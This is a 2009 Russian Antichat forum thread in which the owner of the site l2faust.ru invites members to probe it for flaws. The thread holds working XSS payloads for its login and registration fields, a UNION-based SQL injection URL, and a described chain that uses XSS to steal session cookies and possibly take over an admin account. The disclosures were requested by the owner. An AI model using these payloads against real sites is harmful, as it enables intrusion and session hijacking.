Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   l2faust.ru (https://forum.antichat.xyz/showthread.php?t=156277)

Cthulchu 13.11.2009 17:42

l2faust.ru
 
проверьте двиг. самописное. у кого замечания не по теме - пишем ПМ.

Adm1n4eG 13.11.2009 18:43

XSS
Уязвимо поле Логин или вот так http://l2faust.ru/acc/index.php?do=retry&login="><script>alert()</script>

geforse 13.11.2009 20:16

Не только логин ..

// Мда, ну и нахрена была постить полуметровый скриншот, если можно просто написать, что и поле "Секретный вопрос" так же уязвимо?
BlackSun.

S00pY 13.11.2009 21:54

Цитата:

http://l2faust.ru/index.php?lang=ru%60+from+%60newstbl%60+union+sele ct+1,2,version()/*&act=news
MySql-inj
Сначала lang пишеться в сессию... потом учавствует в выборке.
Version():5.0.45-log
--------------------------------------------------
Регистрация->все поля не фильтруються(пост пассивки)
Поле секретного вопроса даст активку при востановлении пассворда..

XenkoK 17.11.2009 13:44

http://l2faust.ru/acc/index.php?do=register

при регистрации во все поля добавить "><script>alert()</script> и нажать регистрация!!! И мы увидим 4 алерта :) XSS

Cthulchu 19.11.2009 23:38

Цитата:

Сообщение от XenkoK
http://l2faust.ru/acc/index.php?do=register

при регистрации во все поля добавить "><script>alert()</script> и нажать регистрация!!! И мы увидим 4 алерта :) XSS

второй пост этой темы почитай.
Ребят, умнички.
ща пофиксим и неплохо было бы перепроверить;)

AKYLA 06.12.2009 23:48

XSS
Цитата:

В пост запросе http://l2faust.ru/acc/index.php
Поля: regLogin, regAnswer, regQuestion, regEmail
Подставляем
Цитата:

1"+onmouseover=alert(12345)+

AKYLA 07.12.2009 00:20

Так же в купе с уязвимостью vBulletin, публичной (поле веб адреса пользователя не фильтруется) и фиксацией сессии, конструируем типа такой ссылки:
Цитата:

http://l2faust.ru/acc/index.php?do=register&regLogin=1"+onmouseover=aler t(document.cookie)+
и вставляем в своем профиле на форуме, теперь при нажатии получаем куки, собственно если постараться то возможно и админа можно заполучить :)

Cthulchu 07.12.2009 11:23

ок спасибо. ребят, спасибо, но давайте так. впредь перед тем, как юзать експлойты - вы меня предупреждайте, чтобы я хостера предупредил, а то они чуть не забанили подсеть с которой была атака.


Время: 11:33